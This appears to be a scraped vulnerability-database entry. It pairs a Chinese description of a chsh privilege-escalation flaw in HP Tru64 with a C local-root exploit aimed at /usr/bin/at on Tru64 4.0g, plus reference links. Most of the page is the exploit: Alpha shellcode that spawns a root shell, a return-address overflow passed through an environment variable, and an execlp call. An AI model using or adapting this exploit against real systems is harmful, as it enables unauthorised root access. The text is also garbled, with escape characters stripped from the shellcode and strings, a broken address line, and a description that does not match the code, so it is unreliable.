https://www.exploit-db.com/exploits/281
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200209-025

Tru64是一款由HP公司开发的Unix操作系统，其中包含chsh工具可以用来更改当前用户相关信息。Tru64中的chsh工具存在漏洞，本地攻击者可以利用这个漏洞提升权限。部分HPTru64操作系统的chsh工具存在问题，允许非特权用户获得root用户权限。没有具体技术细节描述。

/*
 * Tru64 UNIX 4.0g (JAVA) (/usr/bin/at) local root exploit. [ALPHA]
 *
 * Author: Cody Tubbs (loophole of hhp).
 * Site:   www.hhp-programming.net
 * Email:  [email protected]
 * Date:   2/1/2000.
 *
 * I made this without access to gdb, It's untested...
 * may require modification, may require deletion, heh.
 *
 * Note: executable_stack must be on.
 */

#include <stdio.h>
#include <string.h>

#define OFFSET 0
#define ALLIGN 0
#define NOP    "x1fx04xffx47"
#define DBUF   8000 // 5604+4+528? Manipulate if needed.

char shellcode[]= // Alpha setuid(0);+ execl("/bin/sh","sh",0);
 "x30x15xd9x43x11x74xf0x47x12x14x02x42xfcxffx32"
 "xb2x12x94x09x42xfcxffx32xb2xffx47x3fx26x1fx04"
 "x31x22xfcxffx30xb2xf7xffx1fxd2x10x04xffx47x11"
 "x14xe3x43x20x35x20x42xffxffxffxff"
 "x30x15xd9x43x31x15xd8x43x12x04xffx47x40xffx1e"
 "xb6x48xffxfexb7x98xffx7fx26xd0x8cx73x22x13x05"
 "xf3x47x3cxffx7exb2x69x6ex7fx26x2fx62x73x22x38"
 "xffx7exb2x13x94xe7x43x20x35x60x42xffxffxffxff";
 //Taeho Oh shellcode.

//long get_sp(void){ __asm__("bis $31,$30,$0");}

void usage(char *arg) {
  fprintf(stderr, "nTru64 UNIX 4.0g (JAVA) (/usr/bin/at)");
  fprintf(stderr, " local root exploit. [ALPHA] n";
  fprintf(stderr, "Author: Cody Tubbs (loophole of hhp)nn");
  fprintf(stderr, "Usage: %s <offset> [allign(0..3)]n", arg);
  fprintf(stderr, "Examp: %s 0n", arg);
  fprintf(stderr, "Examp: %s 0 1n", arg);
  exit(1);
}

main(int argc, char **argv){
 char eipeip[DBUF], buffer[4096], heh[DBUF+1];
 char *nop;
 int i, offset, allign;
 long address;

 if(argc < 2){
  usage(argv[0]);
 }

 if(argc>1){offset=atoi(argv[1]);}else{offset=OFFSET;}
 if(argc>2){allign=atoi(argv[2]);}else{allign=ALLIGN;}

//address = get_sp() - offset;
address = i& - offset;

 if(allign>0){for(i=0;i<DBUF;i++){eipeip[i]=0x69;}}
 for(i=allign;i<DBUF;i+=4){*(long *)&eipeip[i]=address;}

 nop=NOP;

 for(i=0;i<(4096-strlen(shellcode)-strlen(eipeip));i++){
  //buffer[i]=nop[i%4];
  buffer[i]   = 0x1f;
  buffer[++i] = 0x04;
  buffer[++i] = 0xff;
  buffer[++i] = 0x47;
 }

 memcpy(buffer+i,shellcode,strlen(shellcode));
 memcpy(buffer,"ATEX=",5); 
 putenv(buffer);

 fprintf(stderr,"Return address %#x, offset: %d.n",address,offset);
 execlp("/usr/bin/at","at", eipeip, 0);
}


// milw0rm.com [2001-03-02]

来源:US-CERTVulnerabilityNote:VU#435611
名称:VU#435611
链接:http://www.kb.cert.org/vuls/id/435611
来源:XF
名称:tru64-multiple-binaries-bo(10016)
链接:http://xforce.iss.net/xforce/xfdb/10016
来源:BUGTRAQ
名称:20020902HappyLaborDayfromSnosoft
链接:http://www.securityfocus.com/archive/1/290115
来源:FULLDISC
名称:20020919iDEFENSEOSF1/Tru643.xvulnclarification
链接:http://archives.neohapsis.com/archives/fulldisclosure/2002-q3/1203.html